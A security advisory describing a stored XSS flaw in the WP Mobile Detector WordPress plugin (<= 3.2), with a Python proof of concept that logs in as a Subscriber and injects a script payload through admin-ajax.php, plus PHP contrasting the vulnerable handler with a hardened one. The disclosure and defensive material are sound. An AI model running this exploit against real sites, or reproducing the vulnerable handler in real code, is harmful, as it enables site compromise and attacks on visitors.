WP Mobile Detector <= 3.2 - Stored Cross-Site Scripting (XSS)

Description
The WP Mobile Detector plugin registers the AJAX action 'websitez_options' (line 78 of wp-mobile-detector/websitez-wp-mobile-detector.php) in a way that makes it callable by any authenticated user, regardless of role: the handler performs no capability check before saving the submitted settings. A low-privilege account (a Subscriber is enough) can therefore submit specially crafted form values, such as a mobile title containing HTML, which are stored in the plugin's options and later rendered unescaped to mobile visitors, resulting in a persistent (stored) XSS.
Proof of Concept
import requests

# Credentials of any low-privilege account (e.g. a Subscriber): the AJAX
# handler only requires an authenticated session, not a capability.
target = 'http://localhost'
username = 'test'
password = 'test'
xss_payload = '</title><script>alert(1)</script><title>'

s = requests.session()

# Step 1: authenticate to obtain the WordPress login cookies.
url = '%s/wp-login.php' % target
payload = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
}
r = s.post(url, data=payload)
if not any(c.startswith('wordpress_logged_in') for c in s.cookies.keys()):
    raise SystemExit('login failed: no wordpress_logged_in cookie was set')

# Step 2: call the unprotected AJAX action. No nonce and no capability
# check are enforced, so the injected title is written straight into the
# plugin options and rendered into the <title> of the mobile theme.
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
    "action": "websitez_options",
    "general[selected_mobile_theme]": "wz-mobile",
    "general[mobile_title]": xss_payload,
}
r = s.post(url, data=payload)
print('admin-ajax.php responded HTTP %d' % r.status_code)
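The following is an added illustration of the bug class, not the plugin's own code: the handler names, the option name 'websitez_general' and the theme function names are assumed; only the action name 'websitez_options' and the 'general[...]' field names come from this advisory. It places the vulnerable pattern (an AJAX handler any logged-in user can reach, storing raw input that is echoed into <title>) next to the hardened form a reviewer would expect: capability check, nonce, allow-listed and sanitised input, and output encoding at the point of use. Load one variant or the other, not both, since they hook the same action.

```php
<?php
// Added example, not code from WP Mobile Detector. Names other than the
// 'websitez_options' action and the general[...] fields are assumptions.

/* --- Vulnerable pattern --- */

// wp_ajax_{action} fires for every logged-in user, whatever their role, so
// registering the handler without a capability check already exposes it to
// Subscribers.
add_action( 'wp_ajax_websitez_options', 'wz_vuln_save_options' );

function wz_vuln_save_options() {
    // No nonce, no capability check, no sanitisation: whatever the caller
    // sends is persisted as-is.
    update_option( 'websitez_general', $_POST['general'] );
    wp_die();
}

// Assumed location in the mobile theme header: the stored value is echoed raw.
function wz_vuln_print_title() {
    $general = get_option( 'websitez_general', array() );
    echo '<title>' . $general['mobile_title'] . '</title>';
    // A value of '</title><script>alert(1)</script><title>' closes the tag
    // and the script executes for every mobile visitor.
}

/* --- Hardened pattern --- */

add_action( 'wp_ajax_websitez_options', 'wz_safe_save_options' );

function wz_safe_save_options() {
    // 1. Authorisation: only users allowed to manage settings may change them.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. CSRF protection: the settings form must send a nonce created with
    //    wp_create_nonce( 'websitez_options' ) in the '_ajax_nonce' field;
    //    check_ajax_referer() dies on a missing or invalid nonce.
    check_ajax_referer( 'websitez_options' );

    // 3. Input validation: allow-list the expected fields and sanitise each.
    $in = ( isset( $_POST['general'] ) && is_array( $_POST['general'] ) )
        ? wp_unslash( $_POST['general'] )
        : array();
    $out = array(
        'selected_mobile_theme' => sanitize_key( $in['selected_mobile_theme'] ?? '' ),
        'mobile_title'          => sanitize_text_field( $in['mobile_title'] ?? '' ),
    );
    update_option( 'websitez_general', $out );
    wp_send_json_success();
}

function wz_safe_print_title() {
    $general = get_option( 'websitez_general', array() );
    // 4. Output encoding at the point of use: esc_html() turns '<' into
    //    '&lt;', so the value can never close <title>. This holds even if a
    //    future code path stores unsanitised data (defence in depth).
    echo '<title>' . esc_html( $general['mobile_title'] ?? '' ) . '</title>';
}
```

Two of these four controls are each sufficient on their own to stop the PoC above (the capability check stops the low-privilege caller, esc_html() stops the tag breakout); the nonce and input sanitisation close the related CSRF and data-integrity gaps that an AJAX settings endpoint reachable from admin-ajax.php otherwise leaves open.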

Affects Plugin

WP Mobile Detector <= 3.2 (fixed in version 3.3)

References

URL https://research.g0blin.co.uk/g0blin-00050/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 4361
Verified No
WPVDB ID 8059

Timeline

Publicly Published 2015-06-25
Added 2015-06-25
Last Updated 2019-10-21